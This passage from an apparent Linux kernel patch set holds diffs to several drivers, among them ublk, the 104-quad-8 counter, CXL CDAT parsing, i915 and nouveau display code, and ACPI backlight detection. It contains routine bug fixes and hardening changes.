+ 	mutex_unlock(&init_mutex);
+ 
++	if (auto_detect)
++		*auto_detect = false;
++
+ 	/*
+ 	 * The below heuristics / detection steps are in order of descending
+ 	 * presedence. The commandline takes presedence over anything else.
+@@ -810,6 +850,9 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	if (acpi_backlight_dmi != acpi_backlight_undef)
+ 		return acpi_backlight_dmi;
+ 
++	if (auto_detect)
++		*auto_detect = true;
++
+ 	/* Special cases such as nvidia_wmi_ec and apple gmux. */
+ 	if (nvidia_wmi_ec_present)
+ 		return acpi_backlight_nvidia_wmi_ec;
+@@ -829,15 +872,4 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	/* No ACPI video/native (old hw), use vendor specific fw methods. */
+ 	return acpi_backlight_vendor;
+ }
+-
+-enum acpi_backlight_type acpi_video_get_backlight_type(void)
+-{
+-	return __acpi_video_get_backlight_type(false);
+-}
+-EXPORT_SYMBOL(acpi_video_get_backlight_type);
+-
+-bool acpi_video_backlight_use_native(void)
+-{
+-	return __acpi_video_get_backlight_type(true) == acpi_backlight_native;
+-}
+-EXPORT_SYMBOL(acpi_video_backlight_use_native);
++EXPORT_SYMBOL(__acpi_video_get_backlight_type);
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 22a790d512842..2ed994a313a91 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -233,7 +233,7 @@ static int ublk_validate_params(const struct ublk_device *ub)
+ 	if (ub->params.types & UBLK_PARAM_TYPE_BASIC) {
+ 		const struct ublk_param_basic *p = &ub->params.basic;
+ 
+-		if (p->logical_bs_shift > PAGE_SHIFT)
++		if (p->logical_bs_shift > PAGE_SHIFT || p->logical_bs_shift < 9)
+ 			return -EINVAL;
+ 
+ 		if (p->logical_bs_shift > p->physical_bs_shift)
+@@ -1202,9 +1202,10 @@ static void ublk_handle_need_get_data(struct ublk_device *ub, int q_id,
+ 	ublk_queue_cmd(ubq, req);
+ }
+ 
+-static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
++static int __ublk_ch_uring_cmd(struct io_uring_cmd *cmd,
++			       unsigned int issue_flags,
++			       struct ublksrv_io_cmd *ub_cmd)
+ {
+-	struct ublksrv_io_cmd *ub_cmd = (struct ublksrv_io_cmd *)cmd->cmd;
+ 	struct ublk_device *ub = cmd->file->private_data;
+ 	struct ublk_queue *ubq;
+ 	struct ublk_io *io;
+@@ -1306,6 +1307,23 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	return -EIOCBQUEUED;
+ }
+ 
++static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
++{
++	struct ublksrv_io_cmd *ub_src = (struct ublksrv_io_cmd *) cmd->cmd;
++	struct ublksrv_io_cmd ub_cmd;
++
++	/*
++	 * Not necessary for async retry, but let's keep it simple and always
++	 * copy the values to avoid any potential reuse.
++	 */
++	ub_cmd.q_id = READ_ONCE(ub_src->q_id);
++	ub_cmd.tag = READ_ONCE(ub_src->tag);
++	ub_cmd.result = READ_ONCE(ub_src->result);
++	ub_cmd.addr = READ_ONCE(ub_src->addr);
++
++	return __ublk_ch_uring_cmd(cmd, issue_flags, &ub_cmd);
++}
++
+ static const struct file_operations ublk_ch_fops = {
+ 	.owner = THIS_MODULE,
+ 	.open = ublk_ch_open,
+@@ -1886,6 +1904,8 @@ static int ublk_ctrl_set_params(struct io_uring_cmd *cmd)
+ 		/* clear all we don't support yet */
+ 		ub->params.types &= UBLK_PARAM_TYPE_ALL;
+ 		ret = ublk_validate_params(ub);
++		if (ret)
++			ub->params.types = 0;
+ 	}
+ 	mutex_unlock(&ub->mutex);
+ 	ublk_put_device(ub);
+diff --git a/drivers/counter/104-quad-8.c b/drivers/counter/104-quad-8.c
+index deed4afadb298..d9cb937665cfc 100644
+--- a/drivers/counter/104-quad-8.c
++++ b/drivers/counter/104-quad-8.c
+@@ -97,10 +97,6 @@ struct quad8 {
+ 	struct quad8_reg __iomem *reg;
+ };
+ 
+-/* Borrow Toggle flip-flop */
+-#define QUAD8_FLAG_BT BIT(0)
+-/* Carry Toggle flip-flop */
+-#define QUAD8_FLAG_CT BIT(1)
+ /* Error flag */
+ #define QUAD8_FLAG_E BIT(4)
+ /* Up/Down flag */
+@@ -133,6 +129,9 @@ struct quad8 {
+ #define QUAD8_CMR_QUADRATURE_X2 0x10
+ #define QUAD8_CMR_QUADRATURE_X4 0x18
+ 
++/* Each Counter is 24 bits wide */
++#define LS7267_CNTR_MAX GENMASK(23, 0)
++
+ static int quad8_signal_read(struct counter_device *counter,
+ 			     struct counter_signal *signal,
+ 			     enum counter_signal_level *level)
+@@ -156,18 +155,10 @@ static int quad8_count_read(struct counter_device *counter,
+ {
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	struct channel_reg __iomem *const chan = priv->reg->channel + count->id;
+-	unsigned int flags;
+-	unsigned int borrow;
+-	unsigned int carry;
+ 	unsigned long irqflags;
+ 	int i;
+ 
+-	flags = ioread8(&chan->control);
+-	borrow = flags & QUAD8_FLAG_BT;
+-	carry = !!(flags & QUAD8_FLAG_CT);
+-
+-	/* Borrow XOR Carry effectively doubles count range */
+-	*val = (unsigned long)(borrow ^ carry) << 24;
++	*val = 0;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+ 
+@@ -191,8 +182,7 @@ static int quad8_count_write(struct counter_device *counter,
+ 	unsigned long irqflags;
+ 	int i;
+ 
+-	/* Only 24-bit values are supported */
+-	if (val > 0xFFFFFF)
++	if (val > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+@@ -378,7 +368,7 @@ static int quad8_action_read(struct counter_device *counter,
+ 
+ 	/* Handle Index signals */
+ 	if (synapse->signal->id >= 16) {
+-		if (priv->preset_enable[count->id])
++		if (!priv->preset_enable[count->id])
+ 			*action = COUNTER_SYNAPSE_ACTION_RISING_EDGE;
+ 		else
+ 			*action = COUNTER_SYNAPSE_ACTION_NONE;
+@@ -806,8 +796,7 @@ static int quad8_count_preset_write(struct counter_device *counter,
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	unsigned long irqflags;
+ 
+-	/* Only 24-bit values are supported */
+-	if (preset > 0xFFFFFF)
++	if (preset > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+@@ -834,8 +823,7 @@ static int quad8_count_ceiling_read(struct counter_device *counter,
+ 		*ceiling = priv->preset[count->id];
+ 		break;
+ 	default:
+-		/* By default 0x1FFFFFF (25 bits unsigned) is maximum count */
+-		*ceiling = 0x1FFFFFF;
++		*ceiling = LS7267_CNTR_MAX;
+ 		break;
+ 	}
+ 
+@@ -850,8 +838,7 @@ static int quad8_count_ceiling_write(struct counter_device *counter,
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	unsigned long irqflags;
+ 
+-	/* Only 24-bit values are supported */
+-	if (ceiling > 0xFFFFFF)
++	if (ceiling > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+diff --git a/drivers/cxl/core/pci.c b/drivers/cxl/core/pci.c
+index 57764e9cd19d2..76596cd186214 100644
+--- a/drivers/cxl/core/pci.c
++++ b/drivers/cxl/core/pci.c
+@@ -480,7 +480,7 @@ static struct pci_doe_mb *find_cdat_doe(struct device *uport)
+ 	return NULL;
+ }
+ 
+-#define CDAT_DOE_REQ(entry_handle)					\
++#define CDAT_DOE_REQ(entry_handle) cpu_to_le32				\
+ 	(FIELD_PREP(CXL_DOE_TABLE_ACCESS_REQ_CODE,			\
+ 		    CXL_DOE_TABLE_ACCESS_REQ_CODE_READ) |		\
+ 	 FIELD_PREP(CXL_DOE_TABLE_ACCESS_TABLE_TYPE,			\
+@@ -493,8 +493,8 @@ static void cxl_doe_task_complete(struct pci_doe_task *task)
+ }
+ 
+ struct cdat_doe_task {
+-	u32 request_pl;
+-	u32 response_pl[32];
++	__le32 request_pl;
++	__le32 response_pl[32];
+ 	struct completion c;
+ 	struct pci_doe_task task;
+ };
+@@ -528,10 +528,10 @@ static int cxl_cdat_get_length(struct device *dev,
+ 		return rc;
+ 	}
+ 	wait_for_completion(&t.c);
+-	if (t.task.rv < sizeof(u32))
++	if (t.task.rv < 2 * sizeof(__le32))
+ 		return -EIO;
+ 
+-	*length = t.response_pl[1];
++	*length = le32_to_cpu(t.response_pl[1]);
+ 	dev_dbg(dev, "CDAT length %zu\n", *length);
+ 
+ 	return 0;
+@@ -542,13 +542,13 @@ static int cxl_cdat_read_table(struct device *dev,
+ 			       struct cxl_cdat *cdat)
+ {
+ 	size_t length = cdat->length;
+-	u32 *data = cdat->table;
++	__le32 *data = cdat->table;
+ 	int entry_handle = 0;
+ 
+ 	do {
+ 		DECLARE_CDAT_DOE_TASK(CDAT_DOE_REQ(entry_handle), t);
++		struct cdat_entry_header *entry;
+ 		size_t entry_dw;
+-		u32 *entry;
+ 		int rc;
+ 
+ 		rc = pci_doe_submit_task(cdat_doe, &t.task);
+@@ -557,26 +557,34 @@ static int cxl_cdat_read_table(struct device *dev,
+ 			return rc;
+ 		}
+ 		wait_for_completion(&t.c);
+-		/* 1 DW header + 1 DW data min */
+-		if (t.task.rv < (2 * sizeof(u32)))
++
++		/* 1 DW Table Access Response Header + CDAT entry */
++		entry = (struct cdat_entry_header *)(t.response_pl + 1);
++		if ((entry_handle == 0 &&
++		     t.task.rv != sizeof(__le32) + sizeof(struct cdat_header)) ||
++		    (entry_handle > 0 &&
++		     (t.task.rv < sizeof(__le32) + sizeof(*entry) ||
++		      t.task.rv != sizeof(__le32) + le16_to_cpu(entry->length))))
+ 			return -EIO;
+ 
+ 		/* Get the CXL table access header entry handle */
+ 		entry_handle = FIELD_GET(CXL_DOE_TABLE_ACCESS_ENTRY_HANDLE,
+-					 t.response_pl[0]);
+-		entry = t.response_pl + 1;
+-		entry_dw = t.task.rv / sizeof(u32);
++					 le32_to_cpu(t.response_pl[0]));
++		entry_dw = t.task.rv / sizeof(__le32);
+ 		/* Skip Header */
+ 		entry_dw -= 1;
+-		entry_dw = min(length / sizeof(u32), entry_dw);
++		entry_dw = min(length / sizeof(__le32), entry_dw);
+ 		/* Prevent length < 1 DW from causing a buffer overflow */
+ 		if (entry_dw) {
+-			memcpy(data, entry, entry_dw * sizeof(u32));
+-			length -= entry_dw * sizeof(u32);
++			memcpy(data, entry, entry_dw * sizeof(__le32));
++			length -= entry_dw * sizeof(__le32);
+ 			data += entry_dw;
+ 		}
+ 	} while (entry_handle != CXL_DOE_TABLE_ACCESS_LAST_ENTRY);
+ 
++	/* Length in CDAT header may exceed concatenation of CDAT entries */
++	cdat->length -= length;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/cxl/cxlpci.h b/drivers/cxl/cxlpci.h
+index 920909791bb94..104ad2b725163 100644
+--- a/drivers/cxl/cxlpci.h
++++ b/drivers/cxl/cxlpci.h
+@@ -62,6 +62,20 @@ enum cxl_regloc_type {
+ 	CXL_REGLOC_RBI_TYPES
+ };
+ 
++struct cdat_header {
++	__le32 length;
++	u8 revision;
++	u8 checksum;
++	u8 reserved[6];
++	__le32 sequence;
++} __packed;
++
++struct cdat_entry_header {
++	u8 type;
++	u8 reserved;
++	__le16 length;
++} __packed;
++
+ int devm_cxl_port_enumerate_dports(struct cxl_port *port);
+ struct cxl_dev_state;
+ int cxl_hdm_decode_init(struct cxl_dev_state *cxlds, struct cxl_hdm *cxlhdm);
+diff --git a/drivers/gpio/Kconfig b/drivers/gpio/Kconfig
+index e9917a45b005a..42e5042d01495 100644
+--- a/drivers/gpio/Kconfig
++++ b/drivers/gpio/Kconfig
+@@ -100,7 +100,7 @@ config GPIO_GENERIC
+ 	tristate
+ 
+ config GPIO_REGMAP
+-	depends on REGMAP
++	select REGMAP
+ 	tristate
+ 
+ # put drivers in the right section, in alphabetical order
+diff --git a/drivers/gpio/gpio-davinci.c b/drivers/gpio/gpio-davinci.c
+index fa51a91afa54f..7a26919ff127b 100644
+--- a/drivers/gpio/gpio-davinci.c
++++ b/drivers/gpio/gpio-davinci.c
+@@ -325,7 +325,7 @@ static struct irq_chip gpio_irqchip = {
+ 	.irq_enable	= gpio_irq_enable,
+ 	.irq_disable	= gpio_irq_disable,
+ 	.irq_set_type	= gpio_irq_type,
+-	.flags		= IRQCHIP_SET_TYPE_MASKED,
++	.flags		= IRQCHIP_SET_TYPE_MASKED | IRQCHIP_SKIP_SET_WAKE,
+ };
+ 
+ static void gpio_irq_handler(struct irq_desc *desc)
+@@ -642,9 +642,6 @@ static void davinci_gpio_save_context(struct davinci_gpio_controller *chips,
+ 		context->set_falling = readl_relaxed(&g->set_falling);
+ 	}
+ 
+-	/* Clear Bank interrupt enable bit */
+-	writel_relaxed(0, base + BINTEN);
+-
+ 	/* Clear all interrupt status registers */
+ 	writel_relaxed(GENMASK(31, 0), &g->intstat);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index d5e14a3aa05dd..3dac1e139c5f3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -3045,6 +3045,24 @@ static int amdgpu_device_ip_suspend_phase2(struct amdgpu_device *adev)
+ 		     adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_MES))
+ 			continue;
+ 
++		/* SDMA 5.x+ is part of GFX power domain so it's covered by GFXOFF */
++		if (adev->in_s0ix &&
++		    (adev->ip_versions[SDMA0_HWIP][0] >= IP_VERSION(5, 0, 0)) &&
++		    (adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_SDMA))
++			continue;
++
++		/* Once swPSP provides the IMU, RLC FW binaries to TOS during cold-boot.
++		 * These are in TMR, hence are expected to be reused by PSP-TOS to reload
++		 * from this location and RLC Autoload automatically also gets loaded
++		 * from here based on PMFW -> PSP message during re-init sequence.
++		 * Therefore, the psp suspend & resume should be skipped to avoid destroy
++		 * the TMR and reload FWs again for IMU enabled APU ASICs.
++		 */
++		if (amdgpu_in_reset(adev) &&
++		    (adev->flags & AMD_IS_APU) && adev->gfx.imu.funcs &&
++		    adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_PSP)
++			continue;
++
+ 		/* XXX handle errors */
+ 		r = adev->ip_blocks[i].version->funcs->suspend(adev);
+ 		/* XXX handle errors */
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 8661de32d80a5..7fa1728384bfd 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2183,6 +2183,8 @@ static int detect_mst_link_for_all_connectors(struct drm_device *dev)
+ 				DRM_ERROR("DM_MST: Failed to start MST\n");
+ 				aconnector->dc_link->type =
+ 					dc_connection_single;
++				ret = dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
++								     aconnector->dc_link);
+ 				break;
+ 			}
+ 		}
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611.c b/drivers/gpu/drm/bridge/lontium-lt9611.c
+index 3b77238ca4aff..ae8c6d9d4095f 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611.c
+@@ -258,6 +258,7 @@ static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode
+ 		{ 0x8126, 0x55 },
+ 		{ 0x8127, 0x66 },
+ 		{ 0x8128, 0x88 },
++		{ 0x812a, 0x20 },
+ 	};
+ 
+ 	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
+diff --git a/drivers/gpu/drm/i915/display/intel_color.c b/drivers/gpu/drm/i915/display/intel_color.c
+index c3928d28cd443..85a38d794dd9f 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.c
++++ b/drivers/gpu/drm/i915/display/intel_color.c
+@@ -46,6 +46,11 @@ struct intel_color_funcs {
+ 	 * registers involved with the same commit.
+ 	 */
+ 	void (*color_commit_arm)(const struct intel_crtc_state *crtc_state);
++	/*
++	 * Perform any extra tasks needed after all the
++	 * double buffered registers have been latched.
++	 */
++	void (*color_post_update)(const struct intel_crtc_state *crtc_state);
+ 	/*
+ 	 * Load LUTs (and other single buffered color management
+ 	 * registers). Will (hopefully) be called during the vblank
+@@ -1220,6 +1225,24 @@ void intel_color_commit_arm(const struct intel_crtc_state *crtc_state)
+ 	i915->display.funcs.color->color_commit_arm(crtc_state);
+ }
+ 
++void intel_color_post_update(const struct intel_crtc_state *crtc_state)
++{
++	struct drm_i915_private *i915 = to_i915(crtc_state->uapi.crtc->dev);
++
++	if (i915->display.funcs.color->color_post_update)
++		i915->display.funcs.color->color_post_update(crtc_state);
++}
++
++void intel_color_prepare_commit(struct intel_crtc_state *crtc_state)
++{
++	intel_dsb_prepare(crtc_state);
++}
++
++void intel_color_cleanup_commit(struct intel_crtc_state *crtc_state)
++{
++	intel_dsb_cleanup(crtc_state);
++}
++
+ static bool intel_can_preload_luts(const struct intel_crtc_state *new_crtc_state)
+ {
+ 	struct intel_crtc *crtc = to_intel_crtc(new_crtc_state->uapi.crtc);
+diff --git a/drivers/gpu/drm/i915/display/intel_color.h b/drivers/gpu/drm/i915/display/intel_color.h
+index 2a5ada67774d0..0256f49c3910d 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.h
++++ b/drivers/gpu/drm/i915/display/intel_color.h
+@@ -17,8 +17,11 @@ void intel_color_init_hooks(struct drm_i915_private *i915);
+ int intel_color_init(struct drm_i915_private *i915);
+ void intel_color_crtc_init(struct intel_crtc *crtc);
+ int intel_color_check(struct intel_crtc_state *crtc_state);
++void intel_color_prepare_commit(struct intel_crtc_state *crtc_state);
++void intel_color_cleanup_commit(struct intel_crtc_state *crtc_state);
+ void intel_color_commit_noarm(const struct intel_crtc_state *crtc_state);
+ void intel_color_commit_arm(const struct intel_crtc_state *crtc_state);
++void intel_color_post_update(const struct intel_crtc_state *crtc_state);
+ void intel_color_load_luts(const struct intel_crtc_state *crtc_state);
+ void intel_color_get_config(struct intel_crtc_state *crtc_state);
+ int intel_color_get_gamma_bit_precision(const struct intel_crtc_state *crtc_state);
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index f0aad2403109b..2d46dcf820a23 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -93,7 +93,6 @@
+ #include "intel_dp_link_training.h"
+ #include "intel_dpio_phy.h"
+ #include "intel_dpt.h"
+-#include "intel_dsb.h"
+ #include "intel_fbc.h"
+ #include "intel_fbdev.h"
+ #include "intel_fdi.h"
+@@ -1264,6 +1263,9 @@ static void intel_post_plane_update(struct intel_atomic_state *state,
+ 	if (needs_cursorclk_wa(old_crtc_state) &&
+ 	    !needs_cursorclk_wa(new_crtc_state))
+ 		icl_wa_cursorclkgating(dev_priv, pipe, false);
++
++	if (intel_crtc_needs_color_update(new_crtc_state))
++		intel_color_post_update(new_crtc_state);
+ }
+ 
+ static void intel_crtc_enable_flip_done(struct intel_atomic_state *state,
+@@ -6946,7 +6948,7 @@ static int intel_atomic_prepare_commit(struct intel_atomic_state *state)
+ 
+ 	for_each_new_intel_crtc_in_state(state, crtc, crtc_state, i) {
+ 		if (intel_crtc_needs_color_update(crtc_state))
+-			intel_dsb_prepare(crtc_state);
++			intel_color_prepare_commit(crtc_state);
+ 	}
+ 
+ 	return 0;
+@@ -7399,24 +7401,18 @@ static void intel_atomic_commit_fence_wait(struct intel_atomic_state *intel_stat
+ 		    &wait_reset);
+ }
+ 
+-static void intel_cleanup_dsbs(struct intel_atomic_state *state)
+-{
+-	struct intel_crtc_state *old_crtc_state, *new_crtc_state;
+-	struct intel_crtc *crtc;
+-	int i;
+-
+-	for_each_oldnew_intel_crtc_in_state(state, crtc, old_crtc_state,
+-					    new_crtc_state, i)
+-		intel_dsb_cleanup(old_crtc_state);
+-}
+-
+ static void intel_atomic_cleanup_work(struct work_struct *work)
+ {
+ 	struct intel_atomic_state *state =
+ 		container_of(work, struct intel_atomic_state, base.commit_work);
+ 	struct drm_i915_private *i915 = to_i915(state->base.dev);
++	struct intel_crtc_state *old_crtc_state;
++	struct intel_crtc *crtc;
++	int i;
++
++	for_each_old_intel_crtc_in_state(state, crtc, old_crtc_state, i)
++		intel_color_cleanup_commit(old_crtc_state);
+ 
+-	intel_cleanup_dsbs(state);
+ 	drm_atomic_helper_cleanup_planes(&i915->drm, &state->base);
+ 	drm_atomic_helper_commit_cleanup_done(&state->base);
+ 	drm_atomic_state_put(&state->base);
+@@ -7624,6 +7620,8 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 		 * DSB cleanup is done in cleanup_work aligning with framebuffer
+ 		 * cleanup. So copy and reset the dsb structure to sync with
+ 		 * commit_done and later do dsb cleanup in cleanup_work.
++		 *
++		 * FIXME get rid of this funny new->old swapping
+ 		 */
+ 		old_crtc_state->dsb = fetch_and_zero(&new_crtc_state->dsb);
+ 	}
+@@ -7774,7 +7772,7 @@ static int intel_atomic_commit(struct drm_device *dev,
+ 		i915_sw_fence_commit(&state->commit_ready);
+ 
+ 		for_each_new_intel_crtc_in_state(state, crtc, new_crtc_state, i)
+-			intel_dsb_cleanup(new_crtc_state);
++			intel_color_cleanup_commit(new_crtc_state);
+ 
+ 		drm_atomic_helper_cleanup_planes(dev, &state->base);
+ 		intel_runtime_pm_put(&dev_priv->runtime_pm, state->wakeref);
+diff --git a/drivers/gpu/drm/i915/display/intel_display.h b/drivers/gpu/drm/i915/display/intel_display.h
+index 714030136b7f2..ef73730f32b09 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.h
++++ b/drivers/gpu/drm/i915/display/intel_display.h
+@@ -440,6 +440,14 @@ enum hpd_pin {
+ 	     (__i)++) \
+ 		for_each_if(plane)
+ 
++#define for_each_old_intel_crtc_in_state(__state, crtc, old_crtc_state, __i) \
++	for ((__i) = 0; \
++	     (__i) < (__state)->base.dev->mode_config.num_crtc && \
++		     ((crtc) = to_intel_crtc((__state)->base.crtcs[__i].ptr), \
++		      (old_crtc_state) = to_intel_crtc_state((__state)->base.crtcs[__i].old_state), 1); \
++	     (__i)++) \
++		for_each_if(crtc)
++
+ #define for_each_new_intel_plane_in_state(__state, plane, new_plane_state, __i) \
+ 	for ((__i) = 0; \
+ 	     (__i) < (__state)->base.dev->mode_config.num_total_plane && \
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index 3c573d41d4046..eefd327c42782 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -2018,6 +2018,8 @@ process_csb(struct intel_engine_cs *engine, struct i915_request **inactive)
+ 	 * inspecting the queue to see if we need to resumbit.
+ 	 */
+ 	if (*prev != *execlists->active) { /* elide lite-restores */
++		struct intel_context *prev_ce = NULL, *active_ce = NULL;
++
+ 		/*
+ 		 * Note the inherent discrepancy between the HW runtime,
+ 		 * recorded as part of the context switch, and the CPU
+@@ -2029,9 +2031,15 @@ process_csb(struct intel_engine_cs *engine, struct i915_request **inactive)
+ 		 * and correct overselves later when updating from HW.
+ 		 */
+ 		if (*prev)
+-			lrc_runtime_stop((*prev)->context);
++			prev_ce = (*prev)->context;
+ 		if (*execlists->active)
+-			lrc_runtime_start((*execlists->active)->context);
++			active_ce = (*execlists->active)->context;
++		if (prev_ce != active_ce) {
++			if (prev_ce)
++				lrc_runtime_stop(prev_ce);
++			if (active_ce)
++				lrc_runtime_start(active_ce);
++		}
+ 		new_timeslice(execlists);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_huc.c b/drivers/gpu/drm/i915/gt/uc/intel_huc.c
+index 410905da8e974..0c103ca160d10 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_huc.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_huc.c
+@@ -235,6 +235,13 @@ static void delayed_huc_load_fini(struct intel_huc *huc)
+ 	i915_sw_fence_fini(&huc->delayed_load.fence);
+ }
+ 
++int intel_huc_sanitize(struct intel_huc *huc)
++{
++	delayed_huc_load_complete(huc);
++	intel_uc_fw_sanitize(&huc->fw);
++	return 0;
++}
++
+ static bool vcs_supported(struct intel_gt *gt)
+ {
+ 	intel_engine_mask_t mask = gt->info.engine_mask;
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_huc.h b/drivers/gpu/drm/i915/gt/uc/intel_huc.h
+index 52db03620c609..db555b3c1f562 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_huc.h
++++ b/drivers/gpu/drm/i915/gt/uc/intel_huc.h
+@@ -41,6 +41,7 @@ struct intel_huc {
+ 	} delayed_load;
+ };
+ 
++int intel_huc_sanitize(struct intel_huc *huc);
+ void intel_huc_init_early(struct intel_huc *huc);
+ int intel_huc_init(struct intel_huc *huc);
+ void intel_huc_fini(struct intel_huc *huc);
+@@ -54,12 +55,6 @@ bool intel_huc_is_authenticated(struct intel_huc *huc);
+ void intel_huc_register_gsc_notifier(struct intel_huc *huc, struct bus_type *bus);
+ void intel_huc_unregister_gsc_notifier(struct intel_huc *huc, struct bus_type *bus);
+ 
+-static inline int intel_huc_sanitize(struct intel_huc *huc)
+-{
+-	intel_uc_fw_sanitize(&huc->fw);
+-	return 0;
+-}
+-
+ static inline bool intel_huc_is_supported(struct intel_huc *huc)
+ {
+ 	return intel_uc_fw_is_supported(&huc->fw);
+diff --git a/drivers/gpu/drm/i915/i915_perf.c b/drivers/gpu/drm/i915/i915_perf.c
+index 7d5e2c53c23a7..1a1b74b80e080 100644
+--- a/drivers/gpu/drm/i915/i915_perf.c
++++ b/drivers/gpu/drm/i915/i915_perf.c
+@@ -4612,13 +4612,13 @@ int i915_perf_add_config_ioctl(struct drm_device *dev, void *data,
+ 		err = oa_config->id;
+ 		goto sysfs_err;
+ 	}
+-
+-	mutex_unlock(&perf->metrics_lock);
++	id = oa_config->id;
+ 
+ 	drm_dbg(&perf->i915->drm,
+ 		"Added config %s id=%i\n", oa_config->uuid, oa_config->id);
++	mutex_unlock(&perf->metrics_lock);
+ 
+-	return oa_config->id;
++	return id;
+ 
+ sysfs_err:
+ 	mutex_unlock(&perf->metrics_lock);
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/disp.c b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+index ed9d374147b8d..5bb777ff13130 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/disp.c
++++ b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+@@ -363,6 +363,35 @@ nv50_outp_atomic_check_view(struct drm_encoder *encoder,
+ 	return 0;
+ }
+ 
++static void
++nv50_outp_atomic_fix_depth(struct drm_encoder *encoder, struct drm_crtc_state *crtc_state)
++{
++	struct nv50_head_atom *asyh = nv50_head_atom(crtc_state);
++	struct nouveau_encoder *nv_encoder = nouveau_encoder(encoder);
++	struct drm_display_mode *mode = &asyh->state.adjusted_mode;
++	unsigned int max_rate, mode_rate;
++
++	switch (nv_encoder->dcb->type) {
++	case DCB_OUTPUT_DP:
++		max_rate = nv_encoder->dp.link_nr * nv_encoder->dp.link_bw;
++
++		/* we don't support more than 10 anyway */
++		asyh->or.bpc = min_t(u8, asyh->or.bpc, 10);
++
++		/* reduce the bpc until it works out */
++		while (asyh->or.bpc > 6) {
++			mode_rate = DIV_ROUND_UP(mode->clock * asyh->or.bpc * 3, 8);
++			if (mode_rate <= max_rate)
++				break;
++
++			asyh->or.bpc -= 2;
++		}
++		break;
++	default:
++		break;
++	}
++}
++
+ static int
+ nv50_outp_atomic_check(struct drm_encoder *encoder,
+ 		       struct drm_crtc_state *crtc_state,
+@@ -381,6 +410,9 @@ nv50_outp_atomic_check(struct drm_encoder *encoder,
+ 	if (crtc_state->mode_changed || crtc_state->connectors_changed)
+ 		asyh->or.bpc = connector->display_info.bpc;
+ 
++	/* We might have to reduce the bpc */
++	nv50_outp_atomic_fix_depth(encoder, crtc_state);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/nouveau/nouveau_dp.c b/drivers/gpu/drm/nouveau/nouveau_dp.c
+index e00876f92aeea..d49b4875fc3c9 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_dp.c
++++ b/drivers/gpu/drm/nouveau/nouveau_dp.c
+@@ -263,8 +263,6 @@ nouveau_dp_irq(struct work_struct *work)
+ }
+ 
+ /* TODO:
+- * - Use the minimum possible BPC here, once we add support for the max bpc
+- *   property.
+  * - Validate against the DP caps advertised by the GPU (we don't check these
+  *   yet)
+  */
+@@ -276,7 +274,11 @@ nv50_dp_mode_valid(struct drm_connector *connector,
+ {
+ 	const unsigned int min_clock = 25000;
+ 	unsigned int max_rate, mode_rate, ds_max_dotclock, clock = mode->clock;
+-	const u8 bpp = connector->display_info.bpc * 3;
++	/* Check with the minmum bpc always, so we can advertise better modes.
++	 * In particlar not doing this causes modes to be dropped on HDR
++	 * displays as we might check with a bpc of 16 even.
++	 */
++	const u8 bpp = 6 * 3;
+ 
+ 	if (mode->flags & DRM_MODE_FLAG_INTERLACE && !outp->caps.dp_interlace)
